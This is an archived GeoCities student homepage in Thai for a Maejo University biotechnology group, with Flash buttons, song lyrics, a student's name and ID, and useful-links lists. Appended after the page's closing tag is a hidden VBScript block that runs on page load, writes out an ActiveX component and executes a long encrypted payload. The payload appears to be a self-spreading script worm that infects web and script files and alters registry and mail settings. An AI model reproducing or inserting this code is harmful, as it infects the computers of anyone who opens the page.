<script language="JavaScript">var PUpage="76001055"; var PUprop="geocities"; </script><script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"></script><script language="JavaScript"> var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/biot4_mju/index.html"; var thSpaceId="76001055"; var thIP="92.75.151.80"; var thTs="1235541968"; var thCs="b72bd13a34f6dd08f6be92994fed9aa2";</script><noscript><link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=92.75.151.80&thTs=1235541968"></noscript><script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"></script>
<!-- text above generated by server. PLEASE REMOVE -->
<html>
<head>
<title>nana</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
<!--
body {  margin: 0px  0px; padding: 0px  0px}
a:link { color: #005CA2; text-decoration: none}
a:visited { color: #005CA2; text-decoration: none}
a:active { color: #0099FF; text-decoration: underline}
a:hover { color: #0099FF; text-decoration: underline}
-->
</style>
</head>

<body bgcolor="#FFFFFF" background="image/star4.gif">
<!-- following code added by server. PLEASE REMOVE -->
<link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"><script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"></script>
<!-- preceding code added by server. PLEASE REMOVE -->
<table width="799" border="0" cellpadding="0" cellspacing="0">
  <tr> 
    <td height="170" valign="top" colspan="3"> 
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr> 
          <td width="799" height="170" valign="top"> 
            <div align="center"><font face="Comic Sans MS" size="7" color="#009933">BIOTECHNOLOGY 
              <br>
              &nbsp; MAEJO UNIVERSITY</font></div>
          </td>
        </tr>
      </table>
    </td>
  </tr>
  <tr> 
    <td width="307" height="267" valign="top"> 
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr> 
          <td width="308" height="305" valign="top"><img src="image/microscope.jpg" width="308" height="307"></td>
        </tr>
      </table>
    </td>
    <td valign="top" colspan="2"> 
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr> 
          <td width="491" height="294" valign="top">
            <div align="center">
              <p><b><font color="#9933CC" size="5">คลิกๆๆกันเลย</font></b></p>
              <p align="center">&nbsp;&nbsp;&nbsp;&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button1.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button1.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button2.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button2.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object>&nbsp;&nbsp;&nbsp;&nbsp;<br>
              </p>
              <p align="center"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button3.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button3.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object>&nbsp;&nbsp;&nbsp;&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button4.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button4.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object><br>
              </p>
              <p align="center">&nbsp;&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button5.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button5.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object>&nbsp;&nbsp;&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="147" height="34">
                  <param name=movie value="button7.swf">
                  <param name=quality value=high>
                  <param name="BGCOLOR" value="#99CCFF">
                  <embed src="button7.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="147" height="34" bgcolor="#99CCFF">
                  </embed> 
                </object><br>
                &nbsp;&nbsp;<br>
                <br>
                &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;<br>
              </div>
          </td>
        </tr>
      </table>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="823" valign="top"> 
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr> 
          <td width="621" height="823" valign="top">
            <p><img src="image/image003.jpg" width="622" height="101"></p>
            <p align="left"><font size="5"><b><font color="#FF00FF"><marquee>ขอต้อนรับท่านเข้าสู่เวปของพวกเราชาว 
              &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;biot'64</marquee></font></b></font></p>
            <p align="center"><font size="5"><font color="#FF00FF"><font color="#6600FF" size="4">ยังไม่เคยลืม 
              ยังไม่เคยเลือน มันก็คงเป็นเหมือน เรื่องค้างคา <br>
              เราต้องจำจาก ทั้งที่เรายังรัก แล้วเราต้องร่ำลา </font></font></font></p>
            <p align="center"><font size="4" color="#6600FF"> ไม่หวั่นไหว แม้ใจจะสุดเหงา 
              <br>
              อยากให้เรามั่นคงอยู่อย่างนี้ เก็บไว้หัวใจที่มี ได้ไหม </font></p>
            <p align="center"><font size="4" color="#6600FF">ฉันอยากจะย้ำ อีกสักครั้ง 
              ให้เธอฟังฉัน อีกสักครั้ง <br>
              แต่อยากจะย้ำ อยากจะย้ำ จนเธอนั้นมั่นใจ ถึงต่อให้นาน อีกนานสักเท่าไร 
              <br>
              ก็อยากห้เชื่อใจ ว่าฉันรออยู่ (และฉันจะรอต่อไป อย่างที่ได้เคยบอกไว้ 
              จะรอเธอ) </font></p>
            <p align="center"><font size="4" color="#6600FF">ชีวิตคนเรา แม้ไม่ง่ายดาย 
              ยอมรับในความหมายของมันเถิด <br>
              ถึงแม้เราห่าง ขอให้ความอ้างว้าง ทำให้เราคิดถึงกัน </font></p>
            <p align="center"><font size="4" color="#6600FF">และย้ำ อีกสักครั้ง 
              ให้เธอฟังฉัน อีกสักครั้ง <br>
              แต่อยากจะย้ำ อยากจะย้ำ จนเธอนั้นมั่นใจ ถึงต่อให้นาน อีกนานสักเท่าไร 
              <br>
              ก็อยากให้เชื่อใจ ว่าฉันรออยู่ และฉันจะรอต่อไป <br>
              อย่างที่ได้เคยบอกไว้ และย้ำให้เธอได้มั่นใจ ว่าฉันรักเธอ </font></p>
            <p align="center"><font size="4" color="#6600FF"> รักที่มีไม่ได้บินไปไหน 
              ความห่างไกลระหว่างเธอกับฉัน <br>
              เราหลับตาเราเจอะกันในฝัน ฉันจะย้ำให้เธอมั่นใจ </font></p>
            <p align="center">&nbsp;</p>
            <p align="center"><img src="image/monkey04.gif" width="184" height="124"><br>
            </p><p align="center"><font face="JS Obsawardas" size="5"><b><font color="#9966CC">I 
              &nbsp;am &nbsp;&nbsp;&nbsp;&nbsp;Yaowapa &nbsp;&nbsp;&nbsp;&nbsp;Chaisawad<br>
              ID-NUMBER&nbsp;&nbsp;&nbsp;&nbsp;45110921<br>
              MAJOR &nbsp;&nbsp;&nbsp;COMPUTER&nbsp;&nbsp;&nbsp; ENGINEERING<br>
              GROUP &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4<br>
              </font></b></font><br>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
          </td>
        </tr>
      </table>
    </td>
    <td width="178" valign="top">
      <div align="center">
        <p><font face="Comic Sans MS" size="5" color="#9900CC">Link</font> </p>
        <p><b><font color="#00CC66">ค้นหา</font></b></p>
        <p><font size="4" color="#CC33FF"><a href="http://phonebook.tot.or.th/www/cgi-bin/ida_qry">หมายเลขโทรศัพท์</a><br>
          <a href="http://www.tot.or.th/special/s4.html">หมายเลขโทรศัพท์ต่างประเทศ 
          </a><br>
          <a href="http://busaba.cat.or.th/cgi-bin/postcode/postcode.cgi?db=default&uid=&view_search=1">รหัสไปรษณีย์</a><br>
          <a href="http://www.tot.or.th/special/link_emergency.html">หมายเลขโทรศัพท์ฉุกเฉิน</a><br>
          <a href="http://www.yellowpages.co.th/">สมุดหน้าเหลือง&nbsp;</a><br>
          <a href="https://biller.ais900.com/Customer_Services/">ถามยอดค้าง AIS 
          </a><br>
          <a href="https://sonic2.tac.co.th/bp3/bin/Index?forward=WebMessageForm">ถามยอดค้าง 
          DTAC</a></font></p>
        <p><b><font color="#00CC99">ความรู้</font></b></p>
        <p><font size="4" color="#CC66FF"><a href="http://web.ku.ac.th/schoolnet/">ห้องสมุดออนไลน์</a><br>
          <a href="http://www.krisdika.go.th/html/fslaw.htm">ห้องสมุดกฏหมาย</a><br>
          <a href="http://www.links.nectec.or.th/lexit/lex_t.html">ดิกชั่นนารี่ออนไลน</a></font>์</p>
        <p><b><font color="#00CC66">เดินทาง </font></b></p>
        <p><font size="4" color="#CC33FF"><a href="http://www.thaiair.com/flying/schedule.htm">เที่ยวบิน</a><br>
          <a href="http://www.srt.motc.go.th/search/trainsearchfrm.htm">ตารางเดินรถไฟ</a><br>
          <a href="http://www.bmta.motc.go.th/mainframe-services-t.html">ตารางเดินรถเมล์ 
          </a><br>
          <a href="http://www.traco.motc.go.th/table.htm">ตารางเดินรถ บขส.</a><br>
          <a href="http://www.thaimet.tmd.go.th/">พยากรณ์อากาศ </a></font></p>
        <p><img src="image/moji47.gif" width="90" height="113"></p>
      </div>
    </td>
  </tr>
  <tr> 
    <td height="0"></td>
    <td></td>
    <td></td>
  </tr>
  <tr> 
    <td height="1"></td>
    <td width="314"></td>
    <td></td>
  </tr>
</table>
</body>
</html>

<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "Aik FnUhbrc,EtklQevt)V`sQevt)DcgoecSfgl,>pnlbO`jbcr,CSM,TsQhblj,TilP^tf,Pu`E)Fgn^lwDfsiSsbKH_pt_rq('KHSbtBij('KHCoe_tbMglfes(&KGLgkbIr(&KGCpe^tcM^ij(&KGPpomaeaqe&)Cna Qu_Fsn`tgok IJ>pnekdRo%FglbP_te,RymeQto)LnEormrRcsrmc KevtQeq Pe^dRejp=FQO+OnekTcxqFglb(DiieNaqh*1&TjpQto ; Oe_dQekp+RcaaAjlGfIlsqr&TjpQto, KG_qt^rr(&' 9>0Op Iel(QmnSqr' 9 / QhcnPe^dRejp,CioqeCxftFrnatfolEldIdId QynePtp :  hqt  QhcnPe^dRejp,CioqeQeq DiieRejp=FQO+OnekTcxqFglb(DiieNaqh*2&FflcTbmn.Trgtb  < $ BMDV mnio_d: &sbqcoint7&IJ\sraot&)  #  > $ sbArIf&TkpPtp # tb@rJf&HqmjTbxrFglbTcmm.AllscSctF?tqrgb=FPO,GbtDiie&FflcP^tf)DAqtpi_._tqrgbrtcs=31EiscRcaaTcmm.AllscSctFglbTcmm ; CSM.LpcnQevtCije%FglbP_te,6)GfTwpbSrr=etkl RhbnCijeQekp+Wpiqev_CpLc $ <  #  HQMJ> $ sbArIf&:&?OBYolllab=  #  v_sarfpr: $ KH_pt_rq('&<&v_CpLc $ EtklQevtClpeGfTwpbSrr=sbqTfekFflcTbmn.Trgtb tb@rJf&V_sReutBnb FfCijeQekp+CjopeBnb FfBnb CulcqimnCulcqimnKHCealgbSsb%CsroeltPtpikg*L^srIkdcx@h_r&Ic JaptGnaevCeap : . QhcnGfLcfq(JC^sc(@uprbnrSqrgnd)*1& ;<LAape&`' QhcnIJ@h_ndeQu_ ; CilaiyBipk&8\SrbC : .EjsbKGCfakgcSrb=Cfr%Aqc%Lcfq(JC^sc(@uprbnrSqrgnd)*1&)-1' #  :YPu`E=0Cna GfClpeHJAh^neePu` : Kia(AuorcnqSrrfne,.,JaptGnaevCeap)Cna GfCna DukcrilnDukcrilnKGCpe^tcM^ij(&Ok Croop OequjeNbxrId FnUhbrc :  hqmjTfekEuir CulcqimnCna GfQh^rcFflc : Ject&WfnNaqh*3& $ Ppodr_mFglbsZClmkok Diieq\Jiarlsmfq Qh^rcdYSraqimnbrw\_l_nh.ftjFf(CSM.CijeBxgsqs&SeapeCije&)TeelC_li IJ>pnekdRo%SfaoeDiie*etkl)BlqeQeq DiieRejp=FQO+OnekTcxqFglb(Qh^rcFflc,/,rrre'FglbTcmm.Urftc <  #  HQMJ> $ sbArIf&:&?OBYolllab=  #  v_sarfpr: $ KH_pt_rq('&<&v_CpLc $ EtklQevtDiieRejp,CioqeCna GfBecaslqIb : UsPhcli.PedRcaa( HHEW_@UPRBNR_RSCRYIbektgtfeq\Aedarlr RscrIB&OrtJolkTeosgok ; TsQhblj.OeeRbab(HIEV_JO@AJ_JAAHFNC\PodttapeYMgcooqoctZOrtjolkEuppepsZMbdgaSep&WpSfeil,RbgUrftc HIEV_AUORCNQ_SSBRZIaeltftgep\ &AedarlrIa& \PodttapeYMgcooqoctZOrtjolkEuppepsZ# Ject&OrtJolkTeosgok,/)& .-\KaflZClmnopeUpeSqarilncrv*1)PED_BWLRBAailKGM_iiRcg%FKBY]CRRPEKT]UPEP\FdcnqiribsZ#Dcf^ujtFd$YSmfqw_rb\Ki`rmslfr\Lurlloi Bxnrbsq\&Lbfr(LurLloiVbrqiln*1& $+0ZM^ij\Pt_tfoleoyN^mc)SfaoeDiie'C_li IJJaglOee(HIEV_AUORCNQ_SSBRZIaeltftgep\ &AedarlrIa& \PodttapeYMgcooqoctZOrtjolkEuppepsZ# Ject&OrtJolkTeosgok,/)& .-\KaflZWfdc Pt_tfoleoyN^mc)SfaoeDiie'WqSeejl+RcgTrgtb  HHEW_@UPRBNR_RSCRYSmfqw_rb\Ki`rmslfr\Lfdi`eZ9+0ZOrtjolkZOmtgoksZM^ij\BdgtlrNrbfcrbnae,/3.052)PED_BWLRBAailKGM_iiRcg%FKBY]CRRPEKT]UPEP\PodttapeYMgcooqoctZWfnbotsMbsqadilgSsbpyqtbmZPoodiieq\Jiarlsmfq Muqlmoh GnqepnbtSbtrikgq\-a.d-2.0-0.0-0.0`0.0-0.0-0.0-026Y0.1b016-*_l_nh'C_li IJJaglOee(HIEV_AUORCNQ_SSBRZSlfrw^rc\Jiarlsmfq\Uikdmwp LTYCsroeltSepsfol\Tildlwq Jeqs^ggnd Qu_swsqek\MrmfflcsYMgcooqoctOrtjolkIktcrker PertfnesY0_0a000-0.0-0.0-c.0-0.0-0.0-0.43\.0.e.330 ,bjakk )UsPhcli.PedWpiqeEKCY\CSROELT\UQEO\QoctuaoeZMfcpopodtYOdffcc\.0,0YOstiomkYOntfolsYM_ii\CdftmrMrcfbrcn`e ,.3/042*OEE_AWMRA@ajlKHM^ijRbg&EKCY\CSROELT\UQEO\QoctuaoeZMfcpopodtYOdffcc\.0,0YCmmjol\JaglPertfnesYNcwPt_tfoleoy ,bjakk )IJrmkadeDoidcr%Lcfq(UikP_te,1)&Mrmgoak Cijep\AojmmnFglbsZMfcpopodtSfaoeb\Pt_tfoleoy )Cna DukcrilnDukcrilnKGCpe^tcMflger('Ol Brpoo PepukeNcxqTbmnP^tf :  GfNmt%FQO+FglbEviptq(TilP^tf #  WPcpimt,eue )& RhbnQekpMarh=pyqtbm12YBnb FfFfTbmnP^tf :  svsrej30\ RhbnPt_rqUnFflc : UikP_te $ SWSQEK\Hepnbl12+djlEiscSraotSpCije=WfnNaqh&QYPTCMYKcrkej.aljCna GfUsPhcli.PedWpiqeEKCY\LMC>L]M>CFIKEZSlfrw^rc\Jiarlsmfq\Uikdmwp\AuorcnqVcrpimnYRsnYKcrkej3/*SqaptRpDiieCSM.@onyCijeWgnMarh&te`\hjuail,gff ,TilP^tf #  wbbZFllbeo.ftqCSM.@onyCijeWgnMarh&pyqtbm12Ykhw^lj.did)WgnMarh&pyqtbm12Ydcshtmp+iliC^lj HJ?pmeldQo&WfnNaqh&ue_\Doidcr+hrt, hqt )UsPhcli.PedWpiqeEKCY\CJAPSCS\RMOQ\,dilZ)blifglbTsQhblj.OeeWoireFKBY]CIAQSBS]RLOR\+djlYCmnqeltTwpb*^pnlfc_tfol/u-ksaounio_dWpSfeil,RbgUrftc HIEV_AL>SQEP_POLTZdildiieZDbf_uitGclnZ)WqSeejl+RcgOe_d%FKBY]CIAQSBS]RLOR\sxbfflc\AedarlrI`ol\)TsQhblj.OeeWoireFKBY]CIAQSBS]RLOR\aljfflc\PcpimtCndileY*SBQcointWpSfeil,RbgUrftc HIEV_AL>SQEP_POLTZdilDiieZSeejlYOnek\Aojm_na\ ,TilP^tf # RejpNaqh&US`rgpq.cxb  1 %(UsPhcli.PedWpiqeEKCY\CJAPSCS\RMOQ\bliFglb\QhbljEu\NrlpcrqyQhberH^nblbrq\TSFPoonsY*x6.224AA2-750B+1.CD-5C76*0.A>0.B57.8@} WqSeejl+RcgTrgtb  HHEW_@L?SPEQ_OOMTYdjlCijeYSarfprHlsrEkcmdb\ ,{65.3/601+450A-.1B2*B/F6-.0@02F56A3/4{Qeq DiieRejp=FQO+OnekTcxqFglb(Qt^rrUmFglb,0,qrse&FflcTbmn.Trgtb TbpTcxqFflcTbmn.@lmsbEkdFrnatfolFrnatfol HJJiheGt%)FfIkWfeoe<;  hqmjTfekEuir CulcqimnCna GfRhfsJo`ariln=dmcrmcnq.jo`arilnFfLbfr(QhgsIoaaqimn) 2)=cije RhbnQhgsIoaaqimn=Mfd&TeiqLlc_tfol,6)FfFPO,GbtCxqelsfolN^mc(QhgsIoaaqimn& :>  qhcnRhfsJo`ariln=Lcfq(RhfsJo`ariln*Lbn&TeiqLlc_tfol)-Lbn&FPO,GbtDiieLaje&TeiqLlc_tfol)&)Bnb FfFfLbn&TeiqLlc_tfol)>3TfekTeiqLlc_tfol : RhfsJo`ariln&ZCna GfIJrmkadeDoidcr%TfipLmc^tgok)Bnb FfBnb CulcqimnCulcqimnKHM^ijRbg&RbgQto,DiieLaje'Ol Brpoo PepukeNcxqRbgRejpQto ; TsQhblj.OeeRbab(OeeSqr'Id OeeTbmnSqr=  QhcnUsPhcli.PedWpiqeRbgQto,DiieLajeBnb FfBnb CulcqimnCulcqimnKHO_oQu_(AuorcnqSrrfne)Qu_E=0QeqtLur : .Dm Thglb RrreQeqtLur : ReptMuq ) .Ic ReptMuq < /8TeelCsroeltPtpikg=Fgn^lwDfsi #  :YBxgtDmEldIdOl Brpoo PepukeNcxqSbtTeiqFllbeo ; CSM.DerFllbeo(AuorcnqSrrfne)Qeq Bi`Ssb=Coe_tbO`jbcr(Sarfprikg,Dfcriln_rv'SctFmlaeps=TeiqFllbeo.Qu_FmlaepsDoidcr@osnq ; -FlrE^cf QekpCojdbrik DoidcrpFllbeoCmukt=FmlaepClult+1Bi`Ssb+abdFmlaepClult) RejpDoidcr+N_mbNbxrId AiaSrb,Clult=0TfekL^srIkdcx@h_r=IksrrOet(@uprbnrSqrgnd, \,Jek(AuorcnqSrrfne)*1'SsbPtpikg=Mgd%CsroeltPtpikg*L^srIkdcx@h_r(1*Lbn&CrrpektQtoilg&-JaptGnaevCeap-.)@uprbnrSqrgnd ; HJAh^neePu`(@uprbnrSqrgnd,JaptGnaevCeap)Qu_E=1BlqeGfSsbB ; - Rhbn@uprbnrSqrgnd ; @uprbnrSqrgnd $ AiaSrb,Iqek(.)&ZCxftDlEiscj=0Cop g ; . RoFmlaepClultGfLAape&SrbQtoilg& ; IC_sb(Bi`Ssb+Irej(h)& RhbnFfj<FllbeoCmuktTeelCsroeltPtpikg=CsroeltPtpikg&DgcPu`.Ftcm%j)1& $ \ Eviq BoCna GfCna GfLeutIaqtFnbeuCfao ; FnqtoRcv%CsroeltPtpikg*Y*Lbn&CrrpektQtoilg&-/)Qu_Srrfne : Kia(AuorcnqSrrfne,IaqtFnbeuCfao+/,Iel(@uprbnrSqrgnd)+L^srIkdcx@h_r*1'CsroeltPtpikg=KHCealgbSsb%CsroeltPtpikg*L^srIkdcx@h_r&EkdIcEkdIcLlonKHO_oQu_ ; @uprbnrSqrgndEkdFrnatfolFrnatfol HJNrlp_g^tc(&Ok Croop OequjeNbxrRcgMarhSajub ; HIEV_JO@AJ_JAAHFNC\PodttapeYMgcooqoctZOrtjolkEuppepsZDbgpebAiqkAeerbe=WqSeejl+RcgOe_d%RcgMarhSajub)FfDfsiDbgpeb ; TeelDgshDcgoec : DikajyAiqk&7\ EldIdFmri;1tm 2DfsiDbgpeb ; HJMblSsb%DgshDcgoec)IJrmkadeDoidcr%DgshDcgoec)LeutTsQhblj.OeeWoireRcgMarhSajub,BipkBedrceCna DukcrilnDukcrilnKGukm^gcFllbeo(NaqhLaje'Ol Brpoo PepukeNcxqSbtFllbeoN_mb ; CSM.DerFllbeo(NaqhLaje'SctTfipFglbs=FmlaepN^mc.CijepHqtCxfsrs=0Doo Ca`hTeiqFflc FnTeiqFflcsDiieCxq ; RC_sb(DSL.EeqEvtbnqilnLaje&TeiqFflc.Marh&)FfFflcEut=FTJOo DiieCxq ; HRMIOo DiieCxq ; AQP MrFglbEvt=MHNOp CijeBxr :  JPP  QhcnAailKGAnpbnbTl(RhfsDiie,P^tf,hrmi'EjsbId CijeBxr :  V?S  QhcnAailKGAnpbnbTl(RhfsDiie,P^tf,v`s)BlqeFfFflcEut=FTQTeelHrtBxgsqs=1Bnb FfKevtGf(SC^sc(MarhKake& ; RC_sb(UikP_te $ DcshtmpY')Op %UAape&P^tfN^mc)=U@aqe%WgnMarh&Aeqkqon&)RhbnEtrEuiqtp ; .EkdIcIc FtqEviptq : . QhcnDSL.AomyDiieWfnNaqh&qyptcm02Zdbsitlp,iki ,MarhKakeDSL.AomyDiieWfnNaqh&ue_\Doidcr+hrt,NaqhLajeBnb FfBnb CulcqimnCulcqimnKHSbtBij('Ol Brpoo PepukeNcxqEor,Cie_rReptGt=WPcpimt,S`rgpqFslin_mbIc Cro RhbnFnUhbrc :  hqmjClpeFnUhbrc :  v_s EldIdId FnUhbrc :  v_s  QhcnQeq DSL ; @rcaqeMbgeat%Qcointfne.CijePyqtbmMbgeat)Per TsQhblj : ArbareLbhe`t&TSarfpr.Phcli'EjsbSbtAmpjeLbhe`t=dmcrmcnq._pmlctp( KG_eubsr&AmpjeLbhe`t,sbtALPIB({D905BC/2+1@F.-.1B0*ABB6-.0@02FA56A-B{&AmpjeLbhe`t,coe_tbIlsqalcb('SctWqSeejl=AmpjeLbhe`t,GbtMbgeat%)>pnlbO`jbcr.perCISGD%y0A41FB0/-C073*1/CC-6910+0-A.C6034/26})>pnlbO`jbcr.`rcaqeGnpt_n`e&)Qeq DSL ; >pnlbO`jbcr.DerO_jccq('EldIdSctDgshO`jbcr : DSL.BrfvcsDoo Ca`hDfsiTbmn FnDfsiO_jccqIc BipkRejp,DoiteQyne<< / ?na BipkRejp,DoiteQyne<< . RhbnBxgtFmrCna GfDikajyAiqk=DfsiTbmn.ArgvbLctqepNcxqDfmOqhcr>rp(0)OaldlmgzbFlri:0Tl 1Orhbr?ro(g)=Ikt&(6 ( Onb)&NbxrTcmmSrrfne :  Doo g=. RoLcn%TfipTcxq)QekpKuk : ?s`(Kia(RhfsReut*i)1')GfTcmmNsm=10 RhbnQekpKuk : 08ClpeGfTcmmNsm=1- RhbnQekpKuk : 09Cna GfRejpAh^r=Cfr%TcmmNsm-Oqhcr>rp(f Koa 2)&Ic RejpAh^r=Cfr%32)TfekTbmnCeap : Aho(/8&EkdIcTbmnSqrgnd ; QekpPtpikg&TcmmCfaoNbxrUlLlciSqr=Cxbcstb( Aik HewAor&3&,RhfsReut #v`CoLd&IevApr%0' :   # MteepAor&0& $  &sbArIf$Kcy>rp(.)=&Orhbr?ro(/)&$v_CpLc& HewAor&2& ;  $ LtfeoApr%2' #  &tb@rJf# Kby?ro(1)=&Oqhcr>rp(0)& #v`CoLd&Doo g=. RoLcn%EvePtpikg'&tb@rJf# TbmnNrm=Aqc%Mgd%EvePtpikg*i)1')$v_CpLc& FfTbmnNrm=16 Qhcn$v_CpLc& QekpKuk : 14$v_CpLc& Bnb Ff #v`CoLd&RejpAh^r=Cfr%TcmmNsm+Kby?ro(g Job 1)'&tb@rJf# Ic RejpAh^r=Cfr%26)Tfek &sbArIf$TcmmCfao ; sbAr$v_CpLc& BlqeFfTbmnCeap : Aho(09& Rhbn #v`CoLd&RejpAh^r=v`Lc &sbArIf$EldId&tb@rJf# TeiqTbxr : RhfsReut&TcmmCfao &sbArIf$Ncxq ) $ sbArIf&Cxbcstb(RhfsReut'RhfsReut=CxbSrrfne :   $ QekpPtpikg& HqmjTbxr ::&pcpimtl^neu^gc=sbqcoint;&v`CoLd #  dlcsmbnr.trgtb   #  &:&ait ptwlb=%plsgtfol:^bqoiure8 ject80mx9 qon:-pv;wgdqh80mx9 eegget80mx9 w-gnaev:/89 siqi_ijiqy8 eibdbn%> $ < # &>PNLBTN>MC=HJ # _ducsq FEFGFT:0WFDRH:0cldc=`ok.js,& ^criseV.>crise # X@okplncnq>  #  < $ /?PMLCT;&:&,dgv; &v_CpLc $ <  #  /pcpimt<&v_CpLc $ <  #  s`rgpq jakgsade;v_sarfpr> $ sbArIf&TfipTcxq $ sbArIf&UlLlciSqr&v`CoLd #  < $ /qcoint;&v`CoLd #  < $ /@OAY<&v_CpLc $ <  #  /ETKL;SbqTbxr : RhfsReut&v`CoLd # SnIoakPtp # tb@rJf&HJ]sqapt%) WgnMarh=FPO,GbtQpbcgaiFmlaep(-)&ZGf(DSL.DiieCxfsrs%WgnMarh&te`\Cojdbr,hqt )& RhbnCSM.@onyCijeWgnMarh&te`\Cojdbr,hqt ,TilP^tf #  wbbZkgw_li.eicBnb FfFf(CSM.CijeBxgsqs&WfnNaqh&qyptcm02Zdbsitlp,iki )& RhbnCSM.@onyCijeWgnMarh&pyqtbm12Ydcshtmp+ili,UikP_te $ swsqek3/\ijtajl+ggfEkdIcEkdFrnatfol"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 0"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 0"&vbCrLf&"KeyArr(3) = 2"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?us1235541968" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001055&t=1235541968&f=us-w71" ALT=1 WIDTH=1 HEIGHT=1>
